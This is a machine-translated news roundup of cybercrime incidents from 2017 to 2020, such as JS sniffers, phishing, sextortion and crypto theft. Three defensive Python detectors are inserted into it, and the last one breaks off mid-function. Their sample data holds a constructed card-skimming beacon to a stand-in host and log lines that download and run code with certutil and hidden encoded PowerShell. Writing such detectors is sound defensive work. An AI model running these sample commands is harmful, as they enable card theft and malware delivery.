Translated by
2020/05/22 12:31:04

Cyber crime in the world

Cyber crime status in different regions of the world


Main article: Information security

Cyber wars between the countries

Information on electronic non-aggression agreements and on cyber conflicts between countries is collected in a separate article:

Cyber crime in the commercial sector

An overview of cyber crime events in the banking sector is covered in a separate article:

Losses of the organizations

An overview of the losses the world economy suffers from cyber crime is given in the article:

Price quotes for user data

An analysis of hackers' working conditions is given in the article

Cyber attacks

Types of cyber attacks and overview of key events.


27% of companies worldwide faced cyber attacks on employees' smartphones

In 2019, 27% of companies worldwide faced cyber attacks on employees' smartphones, according to data from Check Point Software Technologies, a developer of information security solutions.

We are now witnessing an epidemic of mobile adware, one of the most common forms of cyber threat aimed at collecting personal information from the user's device. About 4 billion people go online from a smartphone. Nevertheless, companies rarely secure their employees' mobile devices, says Check Point.

About 27% of companies worldwide faced cyber attacks on employees' mobile devices in 2019

The company notes that to steal corporate data and penetrate an organization's network, attackers need to compromise only one mobile device belonging to an employee. Mobile threats are constantly being refined, and fraudsters increasingly use malicious adware tools. These display advertising messages on the smartphone and are used by cybercriminals to carry out sixth-generation cyber attacks, Check Point notes.

Experts cite the Agent Smith malware, detected in 2019, as one example of new mobile adware. Agent Smith infected about 25 million mobile devices worldwide without users even noticing. The program imitated a Google application and exploited known vulnerabilities in the Android system, automatically replacing installed applications with versions containing malicious code. Agent Smith also used the device's resources to display fake advertising that could steal banking credentials and eavesdrop on conversations.

Cybersecurity specialists recommend downloading applications only from official app stores, regularly updating the OS and software on smartphones, not allowing applications to run in the background, and monitoring access permissions.[1]

Germany announced an international search for a Russian accused of cyber attacks on the Bundestag

At the beginning of May 2020, the Prosecutor General's Office of Germany issued a warrant for the arrest of Dmitry Badin, who is accused of cyber attacks on the Bundestag. The 29-year-old Russian was put on the international wanted list. Read more here.

1.3 thousand malware samples named after video conferencing services detected

In mid-April 2020, Kaspersky Lab announced the identification of about 1.3 thousand malicious files masquerading as popular video conferencing services, including Zoom, Webex and Slack.

According to the Russian antivirus developer, about 200 types of threats are distributed by means of this scheme, mainly the adware DealPly and DownloadSponsor. Both are installers that show advertising or load advertising modules.

Malware began to pose as online conferencing services more often


As Kaspersky Lab states, the danger of adware that imitates the names of services should not be underestimated. As a result of attacks by such programs, a person's confidential information can end up on third-party servers without their consent. And the amount of data such programs collect is quite varied: user preferences, search history, geolocation and many other things, the company explained.

Platforms for online conferences have gained great popularity in the world now; large and small companies use them for video conferencing, and ordinary users turn to them to communicate with friends and family, so we cannot exclude that the number of malicious files exploiting the names of such services will grow in the near future, commented Kaspersky Lab security expert Denis Parinov.

As for the popularity of particular services among cybercriminals, the shares were distributed as follows: Zoom took first place (42.42%), WebEx second (22.51%), and GoToMeeting third (12.86%).

In addition, threats hiding under the guise of files with the .lnk extension (application shortcuts) were detected. The vast majority of these files were in practice malicious elements that exploit vulnerabilities in various programs.[2]

How cybercriminals earn millions from the coronavirus

On March 13, 2020, the antivirus company Eset issued a statement on how cybercriminals profit from the coronavirus.

According to experts, attackers spread news on behalf of the World Health Organization (WHO), urging users to follow malicious URLs to obtain supposedly confidential and extremely important information about the virus. In this way they steal personal information and payment data, gaining access to victims' accounts. Eset recommends being more attentive and checking the e-mail address from which a message came: for example, the addresses , or have no relation to WHO.

Eset announced the emergence of new cyber threats connected with the spread of the coronavirus

Fraudsters also resort to fake charity events, creating mailings with an appeal to send donations for the search for a coronavirus vaccine for children in China.

In addition, fraud with fake offers to sell medical masks and hand sanitizers is gaining popularity. With their help attackers extract users' credit card data and steal money from accounts. According to Sky News, in February 2020 alone criminals in Great Britain earned at least 800 thousand pounds sterling ($1 million) from such a campaign.

Eset advises not to give in to the panic in society and to be especially attentive to any resources and mailings mentioning the coronavirus. One should be wary of fraudulent charitable organizations or crowdfunding campaigns aimed at fighting the epidemic, and ignore messages that request personal or payment data. One more measure of protection from cybercriminals is to use comprehensive antivirus solutions with e-mail protection modules and anti-phishing functions.[3]

In Indonesia, cybercriminals who infected hundreds of online stores worldwide were detained

On January 27, 2020, it became known that the cyber police of Indonesia, together with Interpol and Group-IB, detained members of a criminal group that infected hundreds of online stores in Australia, Brazil, Great Britain, Germany, Indonesia, the USA and other countries with JavaScript sniffers, a popular type of malicious code. Among the victims there are Russian and Ukrainian users. The criminals stole buyers' bank card data and used it to purchase gadgets and luxury goods. The liquidation of this criminal group became the first successful operation against JS sniffer operators in the Asia-Pacific region (APAC).

As reported, the joint operation "Night Fury" by the Indonesian cyber police, INTERPOL's ASEAN Cyber Capability Desk (ASEAN Desk) and Group-IB's investigations department was carried out in APAC in December 2019; as a result, three residents of Indonesia aged from 23 to 35 were arrested. All of them are charged with theft of electronic data using GetBilling sniffers. The operation continues in 5 other regions of the Asia-Pacific.

The GetBilling sniffer family was first described in Group-IB's report "Crime without Punishment" in April 2019. JavaScript sniffers are a popular type of malicious code used in attacks on online stores to steal buyers' personal and payment data: bank card numbers, names, addresses, logins, phone numbers and user data from payment systems. Group-IB Threat Intelligence specialists have tracked the GetBilling JS sniffer family since 2018. Analysis of the infrastructure controlled by the GetBilling operators arrested in Indonesia showed that they managed to infect nearly 200 websites in Indonesia, Australia, Europe, the United States, South America and some other countries.
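A defender-side check for the kind of injected code described above, as an added example (not Group-IB's tooling or any code from the original page): it scans a saved copy of a checkout page for scripts loaded from hosts outside an allowlist and for inline scripts that both reference payment fields and contain a network-send or obfuscation primitive. The allowlist and the sample page are constructed; the hostnames in it are placeholders.

```python
"""Static indicator scan for JavaScript sniffer activity in a checkout page.

Two checks a defender can run on a saved checkout page:
  1. external <script src> hosts that are not on the shop's allowlist;
  2. inline scripts that touch payment fields AND contain a network-send
     primitive (fetch, XMLHttpRequest, sendBeacon, Image beacon) or a
     decoding/obfuscation primitive (atob, hex escapes, fromCharCode).
All sample data below is constructed for the example.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

PAYMENT_FIELDS = re.compile(r"card[_-]?number|cc[_-]?num|cvv|cvc|expir", re.I)
NETWORK_SEND = re.compile(
    r"\bfetch\s*\(|XMLHttpRequest|sendBeacon|new\s+Image\s*\(|\.src\s*=", re.I)
OBFUSCATION = re.compile(r"\batob\s*\(|\\x[0-9a-f]{2}|String\.fromCharCode", re.I)


class ScriptCollector(HTMLParser):
    """Collects external script URLs and inline script bodies from HTML."""

    def __init__(self):
        super().__init__()
        self.external = []      # values of <script src=...>
        self.inline = []        # bodies of <script>...</script>
        self._in_inline = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_inline = True
            self._buf = []

    def handle_data(self, data):
        if self._in_inline:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_inline:
            self._in_inline = False
            self.inline.append("".join(self._buf))


def scan_checkout_page(html, allowed_script_hosts):
    """Return a list of (finding_type, detail) tuples for the page."""
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for src in parser.external:
        # urlsplit handles protocol-relative "//host/x.js"; relative paths give None
        host = urlsplit(src).hostname
        if host and host.lower() not in allowed_script_hosts:
            findings.append(("external_script_unknown_host", host.lower()))
    for body in parser.inline:
        reasons = []
        if PAYMENT_FIELDS.search(body):
            reasons.append("payment_fields")
        if NETWORK_SEND.search(body):
            reasons.append("network_send")
        if OBFUSCATION.search(body):
            reasons.append("obfuscation")
        # Touching card fields alone is normal (client-side validation);
        # flag only when combined with a send or obfuscation primitive.
        if "payment_fields" in reasons and len(reasons) > 1:
            findings.append(("inline_script_suspicious", "+".join(reasons)))
    return findings


# Constructed sample: one allowed script, one unknown host, one benign
# validator that only reads a field, and one sniffer-like indicator.
ALLOWED_SCRIPT_HOSTS = {"cdn.shop.example"}
SAMPLE_CHECKOUT = """
<html><body>
<form id="payment"><input name="card_number"><input name="cvv"></form>
<script src="https://cdn.shop.example/checkout.js"></script>
<script src="//stats.unknown-cdn.example/t.js"></script>
<script>
  // benign: validates the card_number field locally, sends nothing
  function validCard(){ var n=document.querySelector('[name=card_number]').value;
    return /^[0-9]{13,19}$/.test(n); }
</script>
<script>
  // constructed indicator: references cvv/card_number, decodes and beacons out
  navigator.sendBeacon('//collect.unknown-cdn.example/c', atob(payload_cvv_card_number));
</script>
</body></html>
"""

if __name__ == "__main__":
    for kind, detail in scan_checkout_page(SAMPLE_CHECKOUT, ALLOWED_SCRIPT_HOSTS):
        print(f"{kind}: {detail}")
```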

In 2019, Group-IB's investigations department team managed to establish that part of GetBilling's infrastructure was deployed in Indonesia. INTERPOL's ASEAN Desk quickly informed the Indonesian cyber police of this. Although the GetBilling sniffer operators tried to hide their location (for example, they always used a VPN to connect to the server used for collecting stolen data and controlling the sniffer, and paid for hosting services and domain purchases only with stolen cards), Group-IB experts together with local police officers managed to collect evidence that the group was operating from Indonesia, and then to trace the suspects.

In the modern digital world, cybercriminals very quickly adopt advanced technologies to hide their illegal activity and to steal large arrays of personal data for financial gain. To provide law enforcement agencies with access to the information needed to fight cyber crime, a strong and fruitful partnership between the police and information security experts is required.

Craig Jones, INTERPOL's Director of Cybercrime Investigations, said

Example of a malicious GetBilling script

This case clearly shows the international scope of cyber crime: the JS sniffer operators lived in Indonesia but attacked e-commerce resources worldwide, which complicated the collection of evidence, the search for victims and legal prosecution. However, international cooperation and data exchange can effectively help to counteract current cyber threats. Thanks to the prompt actions of the Indonesian cyber police and Interpol, "Night Fury" became the first successful international operation against JavaScript sniffer operators in the APAC region. It is an example of coordinated cross-border fight against cyber crime.

Vesta Matveeva, head of the information security incident investigations department at Group-IB APAC, said

During the search, police officers seized laptops, mobile phones of various manufacturers, processors, ID cards and bank cards from the detainees. According to the investigation, the suspects used the stolen payment data to purchase gadgets and luxury goods, which they then resold on Indonesian websites below market value. The suspects have already been charged with theft of electronic data; under the criminal code of Indonesia this crime is punishable by imprisonment for up to ten years. The investigation continues.

Sextortion via smart cameras

In mid-January 2020, researchers raised the alarm over a wave of a new type of fraud: sextortion against the background of panic about the security of smart cameras. Read more here.


Hackers attack gas stations and steal motorists' banking data

In mid-December 2019, Visa warned clients that several hacker groups had begun to attack gas stations by implanting malware in corporate networks to steal motorists' payment card data.

According to Visa's report, the hackers departed from the old technique of stealing banking data by installing physical skimmers at gas stations. Analysts identified two incidents in which attackers implanted malware directly into the corporate networks of fuel dealers. Having penetrated the IT infrastructure of the retail chains, the hackers gained access to the point-of-sale systems containing unencrypted credit and debit card data. To spread the malware, the hackers used the companies' e-mail, sending letters from fake accounts.

Visa warned clients that several hacker groups had begun to attack gas stations by implanting malware in corporate networks to steal motorists' payment card data

Visa analysts noted that fuel retailers often neglect basic security technologies for protecting card data, such as end-to-end encryption or tokenization. In addition, Visa's report notes that many gas stations still rely on card readers that accept magnetic stripe cards rather than chip cards, which increases the risk of compromise.

Any business that accepts, stores, processes or transmits payment card data must comply with the PCI standards. However, a Verizon survey conducted in December 2019 among more than 300 organizations showed that only 37% of them maintain full compliance with all security requirements at all times.

One of the proposed methods of countering attackers is network segmentation. It not only demands greater skill and time from hackers to penetrate the required part of the network, but also creates detection points where defenders can track the attacker's activity.[4]

The largest hacker group in history is exposed

At the beginning of December 2019, the U.S. Department of the Treasury called Evil Corp the largest hacker group in history and stated that it is based in Moscow. Read more here.

Credit card data stolen from hotel guests

At the end of November 2019, a series of cyber attacks on hotels worldwide became known. In these attacks hackers try to steal credit card data stored in the IT systems of hotels and travel agencies.

Kaspersky Lab reported a new malicious campaign from which at least 20 representatives of the hotel business in Brazil, Argentina, Bolivia, Chile, Costa Rica, France, Italy, Mexico, Portugal, Spain, Thailand and Turkey suffered.

Cyber attacks that hit hotels worldwide

To collect information from clipboards, printers and screenshots of documents, the attackers use remote administration Trojans, distributing them through malicious Word, Excel and PDF attachments in phishing letters. The letters imitate official requests for group reservations from real people at real companies and look very convincing: they include copies of official documents and detailed explanations of the reasons why this hotel was chosen. The only thing that gives away the forgery is spelling errors in the company's domain.
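The two detection points the page raises (checking that a sender address really belongs to WHO, and catching misspelled company domains in the hotel reservation letters) both come down to comparing the sender's domain with the domains it pretends to be. The following is an added example, not code from the original page or from Eset or Kaspersky Lab: it classifies `From:` headers against an allowlist using homoglyph folding, edit distance, and a check for the legitimate name embedded at the front of a longer domain. The allowlist and sample headers are constructed.

```python
"""Sender-domain lookalike check for phishing triage (added example).

A sender domain is 'ok' when it is on the allowlist, 'lookalike' when it
closely resembles an allowlisted domain, and 'unknown' otherwise.
Lookalike rules:
  1. the legitimate domain, with dots kept or turned into hyphens, appears
     at the front of a longer domain (who.int -> who-int.example);
  2. after folding common homoglyphs (0/o, 1/l, rn/m, vv/w) the edit
     distance to a legitimate domain is small (grandhote1 -> grandhotel).
All domains below are constructed placeholders.
"""
import unicodedata
from email.utils import parseaddr

# Multi-character substitutions first so "rn" is folded before single chars.
HOMOGLYPHS = [("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "l"), ("|", "l")]


def edit_distance(a, b):
    """Levenshtein distance with a single rolling row."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def normalize(domain):
    """Lower-case, NFKC-fold (full-width letters), strip trailing dot/www."""
    d = unicodedata.normalize("NFKC", domain).strip().lower().rstrip(".")
    return d[4:] if d.startswith("www.") else d


def fold_homoglyphs(domain):
    for src, dst in HOMOGLYPHS:
        domain = domain.replace(src, dst)
    return domain


def classify_sender(header_value, allowlist, max_distance=2):
    """Return (verdict, sender_domain, matched_legit_domain_or_None)."""
    _, addr = parseaddr(header_value)
    if "@" not in addr:
        return ("unknown", "", None)
    domain = normalize(addr.rsplit("@", 1)[1])
    legit = [normalize(d) for d in allowlist]
    if domain in legit:
        return ("ok", domain, domain)
    folded = fold_homoglyphs(domain)
    best, best_dist = None, None
    for cand in legit:
        # Rule 1: legitimate name embedded at the front of a longer domain.
        hyphenated = cand.replace(".", "-")
        if domain.startswith((cand + ".", hyphenated + ".", hyphenated + "-")):
            return ("lookalike", domain, cand)
        # Rule 2: near-identical after homoglyph folding.
        dist = edit_distance(folded, fold_homoglyphs(cand))
        if best_dist is None or dist < best_dist:
            best, best_dist = cand, dist
    if best_dist is not None and best_dist <= max_distance:
        return ("lookalike", domain, best)
    return ("unknown", domain, None)


def triage(headers, allowlist):
    """Classify a batch of From: header values; returns list of verdict tuples."""
    return [classify_sender(h, allowlist) for h in headers]


# Constructed allowlist and sample From: headers.
ALLOWLIST = ["who.int", "grandhotel.example"]
SAMPLE_FROM_HEADERS = [
    '"Grand Hotel Reservations" <reservations@grandhote1.example>',  # 1 for l
    '"WHO Alerts" <alerts@who-int.example>',                          # dot -> hyphen
    "<booking@grandhotel.example>",                                   # legitimate
    "<reservations@grandhotell.example>",                             # extra letter
    "<news@unrelated.example>",                                       # no resemblance
]

if __name__ == "__main__":
    for header, (verdict, domain, match) in zip(SAMPLE_FROM_HEADERS, triage(SAMPLE_FROM_HEADERS, ALLOWLIST)):
        print(f"{verdict:9} {domain:28} {'' if match is None else '~ ' + match}")
```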

The attackers not only use remote access to the infected computers themselves but also sell it on illegal forums. Several cyber groups take part in the campaign, including RevengeHotels and ProCC.

According to the service that was used to shorten the malicious URL, it also spread in many countries other than those listed above, so the volume of compromised data may be much larger.

Kaspersky Lab recommends that travelers use a virtual payment card for hotel bookings through online travel agencies, and for payment on site either a virtual wallet or a card with a limited amount of money on the account.[5]

Belarusian stole 630 thousand euros from banks and returned the money in bitcoins

On November 12, 2019, the Investigative Committee of Belarus announced an investigation into a criminal case concerning theft of money from the accounts of foreign banks. The 28-year-old resident of Grodno involved in the crimes was arrested with the assistance of the American FBI. Read more here.

School students carry out mass DDoS attacks

On November 11, 2019, Kaspersky Lab published the results of a study showing 32 percent growth in the number of DDoS attacks worldwide in the third quarter compared with the same period of 2018. Approximately the same surge in cyber attacks occurred compared with the second quarter of 2019.

According to experts, school students were responsible for almost half of DDoS attacks in the third quarter. At the same time, Russia was among the leading countries where DDoS attacks on educational resources were detected.

Average duration of DDoS attacks, Kaspersky Lab data

The busiest day in this respect in the reporting quarter was July 22, when 467 DDoS attacks were recorded. The quietest was August 11, with 65 attacks.

The activity of DDoS amateurs in the third quarter of 2019 partly explains why the number of "smart" attacks, which are technically more complex and demand more ingenuity from attackers, noticeably decreased over these three months, the study says.

Kaspersky Lab calculated that in the 2018–2019 academic year users were attacked more than 350 thousand times through electronic textbooks and papers. Specialists note that such malware poses a greater danger to large companies than to ordinary users, and note growth in hacker activity in the field of education around the world.

According to the forecasts of the Russian antivirus vendor, in the fourth quarter of 2019 the number of attacks will certainly grow again on the eve of the holidays.

The wave of attacks on education sector resources will subside by winter, but they will be left alone completely only by summer, with the start of vacation, experts are sure.

Alexey Kiselyov, business development manager of Kaspersky DDoS Protection in Russia, says that DDoS attacks are the second most popular type of attack on small and medium businesses.[6]

Officials around the world attacked via WhatsApp

At the end of October 2019, a large-scale hacker attack on high-ranking officials via WhatsApp worldwide became known. Cybercriminals used a vulnerability in the messenger to gain access to the smartphones of more than 1.4 thousand users. Read more here.

Fortinet 2019 Operational Technology Security Trends Report

  • In 2018 the number of attacks aimed at outdated software in OT systems grew considerably
  • Cybercriminals exploit the lack of a standardized protocol for OT networks
  • Attacks on OT systems are not differentiated by geography or industry
  • 85% of new threats were detected on devices with OPC Classic, BACnet and Modbus

Having analyzed data for 2018[7], researchers identified a set of attacks using IT networks, directed first of all at industrial networks whose software has not been updated for a long time. On the other hand, similar actions against IT systems are no longer effective. In addition, growth in the number of attacks directed at SCADA and ICS is observed.

Such threats are often aimed at the most vulnerable parts of OT networks and exploit the difficulties caused by the lack of standardization of protocols. It is also notable that such attacks are not differentiated by geography or industry: in 2018 growth was observed in all directions and in all regions of the world.

Fortinet experts also identified a disturbing trend of increasing prevalence of exploits for practically every ICS/SCADA supplier. In addition to attacks on unpatched OT systems, 85% of new threats were detected on devices with OPC Classic, BACnet and Modbus. Cybercriminals also exploit a broad spectrum of OT protocols that have no uniform standard and differ depending on system functionality, geography and industry. This creates difficulties for vendors worldwide in developing security solutions for OT systems.

In general, the research showed that the risks connected with IT/OT convergence are quite real and should be taken seriously by any organization that has begun to connect industrial systems to IT networks. Attackers will continue to exploit the slower cycles of technology replacement and updating at enterprises. This trend will probably persist for many years. The best way to resist new threats is to adopt and implement a comprehensive strategic approach that simplifies the functioning of OT systems and involves all the IT and OT experts available in the organization.

Cost of a hacker attack

The costs of a hacker attack pay off right after the first theft, according to a study of the hacker economy by Positive Technologies. The initial cost of a hacker attack on financial institutions is about 45-55 thousand US dollars, specialists reported in May 2019.

A monthly subscription to a service for creating documents with embedded malware costs about 2.5 thousand US dollars, tools for creating malicious files cost 300 dollars, the source code of a malware loader starts from 1.5 thousand dollars, a program for exploiting vulnerabilities to implant malware costs about 10 thousand dollars, and legal tools that hackers can use are estimated by market experts at 30–40 thousand dollars.

The smallest expense is the mailing of malware. According to the experts' estimates, it costs about 1 thousand dollars a month.

Fraudster extracted $123 million from Google and Facebook

At the end of March 2019, the U.S. Department of Justice brought charges against a citizen of Lithuania who extracted $123 million from Google and Facebook. The fraudster, who pleaded guilty, deceived the American companies using business e-mail compromise. Read more here.

Mass arrests of dark web users

At the end of March 2019, mass arrests of criminals who conducted illegal activity on the dark web became known. Read more here.

Mini-cameras built into dozens of hotels: it was possible to spy on guests for $50 a month

In mid-March 2019, it became known that mini-cameras had been installed in dozens of hotels in South Korea. Secret footage of 1600 unsuspecting tourists was broadcast live; it was possible to spy on guests for $50 a month.

In total, 30 hotels in ten cities of the country were involved in the scandal; two offenders have already been arrested, two more are under investigation. Cameras were hidden in digital TV boxes, wall sockets and hair dryer holders, and the recorded footage was broadcast online, said the statement of the cyber-investigations department of the National Police Agency. More than 4000 members were registered on the broadcasting website, 97 of whom paid for access to the cameras monthly. According to police, between November 2018 and March 2019 this service brought the offenders more than $6000.

Guests of motels in South Korea were recorded by hidden cameras and the video was broadcast online

South Korea is not facing such a situation for the first time: in 2012 police registered more than 2400 cases of illegal filming, in 2017 already more than 6400 cases, and this indicator is growing. In 2018 tens of thousands of women took to the streets of Seoul and other cities to protest against such violations under the slogan "My Life Not Your Porn!"

In response, Seoul created a special group of female inspectors who carry out regular inspections of about 20,000 public toilets in the city in search of hidden cameras. However, critics condemn this step as a superficial measure. Nevertheless, police activity is not limited to this: in January 2019 the co-owner of the South Korean porn website Soranet, which was closed in 2018 and was a popular site for uploading video and photos made with hidden cameras, was sentenced to four years in prison and undertook to pay a fine of $1.26 million.[8]

Fraudsters posing as Microsoft technical support installed viruses

At the end of February 2019, Baljinder Singh, the owner of Devine Technical Services, who under the guise of Microsoft technical support offered to remove viruses from users' computers but actually installed malware to steal money, was sent to prison. Read more here.


Sextortion on the Internet gains popularity

In August 2018, a method of extorting money that was gaining popularity on the Internet became known. Cyber fraudsters blackmail users by claiming they will tell their friends and relatives about them viewing porn.

The hackers send an e-mail containing logins and passwords used by the victim, which most likely leaked earlier. The authors of the message claim that they hacked the webcam and recorded the person watching pornographic videos and what they were doing at the time. The fraudsters then demand a ransom in bitcoins so that they do not send the video they allegedly have.

Hackers earned $0.5 million by blackmailing victims with the threat of telling relatives about them viewing porn

One such letter read as follows:

I know that it is your password. At first we recorded the video which you watched (you have a good taste, very ha), and then made a recording from your webcam (yes, that place where you are engaged in dirty affairs).

In this message the hackers demand that $1400 be transferred to a bitcoin wallet within 24 hours. As proof, they express readiness to send the intimate video to several friends.

Users who fear for their reputation agree to the fraudsters' demands.

As Suman Kar, CEO of the cyber security company Banbreach, told Motherboard, fraudsters could earn $500 thousand from such a scheme with minimal effort, using old passwords.

Banbreach studied about 770 e-wallets specified by fraudsters in sextortion messages. The majority (540) of the wallets were empty, but in 230 more than 1 thousand transactions for a total of 71 bitcoins were recorded.[9]

Some attackers find victims on social networks and in webcam chats, approach them under the guise of an attractive woman or man and draw the user into a frank conversation whose purpose is virtual sexual intercourse. As soon as the criminals manage to capture the victim on camera or obtain a screenshot of intimate correspondence, they begin to blackmail them, threatening to publish the video and photos publicly.

Cybercriminals stole about $1.2 billion in cryptocurrency

Since the beginning of 2017, cybercriminals have stolen about $1.2 billion in cryptocurrency. This data is contained in a report of the international non-profit organization Anti-Phishing Working Group (APWG). Excerpts from the study were published on May 24, 2018 by the Reuters agency.

In an interview with the agency, APWG chairman Dave Jevans, who also heads CipherTrace, a company specializing in cryptocurrency security, said that theft of tokens by attackers is a widespread problem, alongside drug trafficking and money muling using cryptocurrencies.

Thefts of cryptocurrencies have reached $1.2 billion since 2017

According to Dave Jevans, of the specified $1.2 billion only about 20% or less has been recovered by law enforcement. According to him, law enforcement bodies are busy tracking the attackers involved in theft of digital money worldwide.[10]

Another large incident connected with cryptocurrency fraud became known in May 2018. The Bloomberg agency reported an investigation begun in the USA into suspected manipulation of the price of bitcoin and other cryptocurrencies.

The U.S. Department of Justice is finding out whether traders resorted to illegal practices affecting quotations, such as spoofing. This term refers to flooding the market with fake orders in order to push other traders to buy or sell cryptocurrency.

The Department of Justice is cooperating in the investigation with the Commodity Futures Trading Commission (CFTC), which regulates the market for bitcoin derivatives.[11]

Earlier, the Central Bank of the Russian Federation assessed the overall damage from thefts on the world cryptocurrency market since the beginning of 2018. As Alisa Melnikova, head of the financial technologies department of the Bank of Russia, reported at the Moscow Exchange forum held on April 10, since the beginning of the year 22 large fraudulent schemes using digital financial assets and cryptocurrencies have been carried out in the world. As a result, attackers stole about $1.36 billion in cryptocurrency, or $23 million a day. In January alone, more than $420 million was withdrawn from the Japanese exchange CoinCheck, Melnikova emphasized, referring to statistics available to the Central Bank.[12]

Technology agreement on cyber security (Cybersecurity Tech Accord)

On April 17, 2018, 34 technology and security companies signed the Cybersecurity Tech Accord, an agreement among the largest group of companies in history undertaking to protect customers from the malicious actions of cybercriminals worldwide. The 34 signatories include ABB, Arm, Cisco, Facebook, HP, HPE, Microsoft Corp., Nokia, Oracle and Trend Micro. Together these enterprises represent the creators and users of the technologies that keep the world's communication and information infrastructure running.

  • Stronger protection: the companies will build stronger protection against cyber attacks. Under this undertaking the companies committed to protecting customers regardless of the motives and purposes of online attacks worldwide.
  • Non-aggression: the companies will not help governments launch cyber attacks and will take measures to protect their products and services from tampering or malicious use at all stages of technology development and distribution.
  • Capacity building: the companies will make additional efforts to support developers, companies and private users of their technologies, helping them to expand their capability for self-defense. Such efforts may include joint development of new practical security standards and new features that the companies will be able to implement in their products and services.
  • Collective action: the companies will develop existing relationships and jointly create new formal and informal partnerships with other industry members, civil society and research circles in order to scale up technical cooperation, identify vulnerability factors, jointly analyze risks and minimize the potential emergence of malicious code in cyberspace.

Although many signatories observed all these principles before the agreement was concluded, albeit without advertising it, this agreement represents a public joint commitment to cooperate on cyber security. The Tech Accord remains open to other signatories from the private sector, regardless of the scale or specialization of their activity, that have a high reputation, strict cyber security standards and agree unconditionally to observe the principles of the document.

Enterprises and organizations of all sizes fall victim to cyber attacks, and the economic damage from such malicious actions could reach 8 trillion US dollars by 2022[13]. Among other risks, recent cyber attacks have led to the closure of small businesses, delays of vital surgeries and failures in the provision of public services.

"The Tech Accord will help to protect the functional integrity of the one trillion networked devices that, according to our forecasts, will be put into operation over the next 20 years," noted Carolyn Herzog, general counsel of Arm. "The agreement brings together the resources, experience and strategic practices of the world's major technology companies, creating a strong base for users of technologies who will be able to take the extensive advantages of a safer networked environment."

Signatories of the Cybersecurity Tech Accord: ABB, Bitdefender, Cisco, ARM, BT, Cloudflare, Avast!, CA Technologies, DataStax, Dell, HPE, SAP, DocuSign, Intuit, Stripe, Facebook, Juniper Networks, Symantec, Fastly, LinkedIn, Telefonica, FireEye, Microsoft, Tenable, F-Secure, Nielsen, Trend Micro, GitHub, Nokia, VMware, Guardtime, Oracle, HP Inc., RSA.

Cybersecurity Tech Accord. This document represents a public joint commitment by 34 international companies intending to protect and support civil society online and to increase the security, stability and resilience of cyberspace.

Microsoft Security Intelligence Report

In April 2018 Microsoft published its Security Intelligence Report covering the period from February 2017. It is based on data gathered by the company's protective programs and services (data on the number of detected threats, not on infection cases). The information was provided by corporate and private users who agreed to share it together with their geolocation.

The report is devoted to three subjects: botnets, popular hacker attack methods and ransomware. The purpose of the report is to raise corporate and private users' awareness of existing threats and of methods for countering them.

The wide spread of botnets and ransomware meant that the share of devices in Russia that encountered cyberthreats between February 2017 and January 2018 reached 25-30% on average per month, whereas the same indicator in the first quarter of 2017 was almost half that, 15%. The highest rates were recorded in Pakistan, Nepal, Bangladesh and Ukraine (33.2% or above), the lowest in Finland, Denmark, Ireland and the USA (11.4% or below).

According to Windows Defender Security Intelligence data, trojans became the most frequently encountered category of unwanted software. Their encounter rate grew from 6% to 10% between February 2017 and January 2018. Figures for other malware types (droppers, obfuscators, ransomware, etc.) were below 1%.

In 2017 "low-hanging fruit" methods such as phishing were used to obtain credentials and other confidential information from users. According to Microsoft Advanced Threat Protection (ATP) data, phishing was among the most serious threats in Office 365 users' mailboxes in the second half of 2017 (53%); 180-200 million phishing emails were detected monthly. In Russia in particular, 7.01 phishing sites were found per 1,000 hosts (worldwide: 5.85). The next most prevalent threats were malware downloaders (29%) and Java backdoors (11%).

Another target for attackers is cloud applications with a low level of security. The research found that 79% of SaaS applications for cloud storage and 86% of SaaS applications for collaboration do not encrypt stored and transmitted data. To protect corporate infrastructure, organizations should restrict users' use of cloud applications that do not use encryption and enforce this with a Cloud Access Security Broker (CASB).

Another trend of the second half of 2017: cybercriminals use legitimate built-in system tools to deliver an infected document (for example, a Microsoft Office document) contained in a phishing email and to download ransomware. The best way to avoid this type of threat is timely updating of the operating system and software.
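The pattern just described, a document-handling application handing off to a built-in script host or download tool, is something a defender can look for in process-creation telemetry. The following is an added detection example, not code from the Microsoft report: it scans a few constructed process-creation log lines (the `key=value` format, host names and command lines are all assumptions made for this example) and flags Office parents that spawn commonly abused built-in tools, adding extra reasons when the command line shows an encoded command, a hidden window or a download URL.

```python
"""Added detection example: flag Office processes that spawn built-in script or
download tools (the "legitimate built-in means" pattern). Log lines, host names
and command lines are constructed for illustration."""
import re
from dataclasses import dataclass

# Document-handling applications that normally never spawn shells or script hosts.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Built-in Windows tools commonly abused to fetch and run a second stage.
LOLBINS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe",
           "mshta.exe", "certutil.exe", "bitsadmin.exe", "regsvr32.exe", "rundll32.exe"}

# Constructed sample lines in an assumed "key=value" process-creation format.
SAMPLE_LOG = """\
ts=2017-11-02T09:14:03Z host=WS-017 parent=explorer.exe image=winword.exe cmdline="WINWORD.EXE invoice.docx"
ts=2017-11-02T09:14:21Z host=WS-017 parent=winword.exe image=powershell.exe cmdline="powershell -nop -w hidden -enc QQBCAEMA"
ts=2017-11-02T09:15:00Z host=WS-017 parent=winword.exe image=splwow64.exe cmdline="splwow64.exe 8192"
ts=2017-11-02T10:02:44Z host=WS-022 parent=excel.exe image=cmd.exe cmdline="cmd /c certutil -urlcache -split -f http://example.invalid/a.dat"
ts=2017-11-02T10:30:10Z host=WS-031 parent=services.exe image=svchost.exe cmdline="svchost.exe -k netsvcs"
"""

LINE_RE = re.compile(
    r'ts=(?P<ts>\S+) host=(?P<host>\S+) parent=(?P<parent>\S+) '
    r'image=(?P<image>\S+) cmdline="(?P<cmdline>[^"]*)"'
)


@dataclass
class Finding:
    ts: str
    host: str
    parent: str
    image: str
    reasons: tuple


def analyze_line(line):
    """Return a Finding for a suspicious Office -> built-in tool spawn, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    parent = m["parent"].lower()
    image = m["image"].lower()
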